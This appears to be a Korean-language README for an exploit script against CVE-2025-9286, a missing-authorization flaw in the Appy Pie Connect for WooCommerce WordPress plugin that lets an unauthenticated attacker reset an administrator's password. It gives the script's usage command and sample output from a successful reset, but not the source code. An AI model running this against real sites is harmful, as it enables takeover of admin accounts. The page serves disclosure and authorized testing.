
Appy Pie Connect for WooCommerce <= 1.1.2 - 권한 부여 누락으로 인한 비인증 권한 상승
Appy Pie Connect for WooCommerce <= 1.1.2 - 누락된 권한 부여로 인한 인증되지 않은 권한 상승
WordPress용 Appy Pie Connect for WooCommerce 플러그인은 1.1.2 이하의 모든 버전에서 reset_user_password() REST 핸들러 내 권한 부여 누락으로 인해 권한 상승에 취약합니다.
이로 인해 인증되지 않은 공격자가 관리자를 포함한 임의 사용자의 비밀번호를 재설정하여 관리자 접근 권한을 얻을 수 있습니다.
다음 익스플로잇은 취약한 플러그인 버전이 실행 중인 WordPress 사이트를 대상으로 CVE-2025-9286을 악용하는 데 사용할 수 있습니다.
스크립트 이름: CVE-2025-9286.py
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.
이 익스플로잇은 교육 및 승인된 침투 테스트 목적으로만 사용해야 합니다.
명시적 허가 없이 시스템을 무단으로 사용하는 것은 불법입니다.
저자는 이 도구로 인한 오용이나 피해에 대해 책임을 지지 않습니다.
제작: Khaled Alenazi (Nxploited)